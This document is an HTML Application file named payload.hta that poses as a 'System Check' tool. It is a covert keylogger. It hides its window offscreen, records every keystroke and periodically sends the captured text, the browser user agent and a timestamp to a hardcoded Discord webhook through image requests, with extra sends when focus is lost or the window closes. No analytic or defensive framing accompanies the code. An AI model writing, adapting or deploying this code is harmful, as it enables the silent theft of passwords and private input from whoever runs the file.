<!-- payload.hta -->
<html>
<head>
  <hta:application id="oHTA" applicationname="System Check" border="none" caption="no" showintaskbar="no" singleinstance="yes" sysmenu="no" windowstate="minimize"/>
</head>
<body style="margin:0; overflow:hidden; background:#000;">

<script language="JScript">
  var log = "";
  var webhook = "https://discord.com/api/webhooks/1472244980662927381/FycSobkkKh_MzI-EcY_cZYC7OGdo9U8yTKBReRTzkfeagFVW6hit4W7ODQ8MqwCL9iiv";

  document.addEventListener("keydown", function(e) {
    var key = e.key;
    if (key === "Enter") key = "[ENTER]";
    if (key === "Backspace") key = "[BACKSPACE]";
    if (key === "Tab") key = "[TAB]";
    if (key === " ") key = "[SPACE]";
    if (key.length > 1) key = "[" + key + "]";
    log += key;

    if (log.length > 30) {
      new Image().src = webhook + "?log=" + encodeURIComponent(log + " | UA: " + navigator.userAgent + " | Time: " + new Date().toLocaleString());
      log = "";
    }
  });

  window.addEventListener("blur", function() {
    if (log.length > 0) {
      new Image().src = webhook + "?log=" + encodeURIComponent("Session Log: " + log);
      log = "";
    }
  });

  window.addEventListener("beforeunload", function() {
    if (log.length > 0) {
      new Image().src = webhook + "?log=" + encodeURIComponent("Browser Log: " + log);
    }
  });

  window.moveTo(-10000, -10000);
  window.resizeTo(1, 1);
</script>
</body>
</html>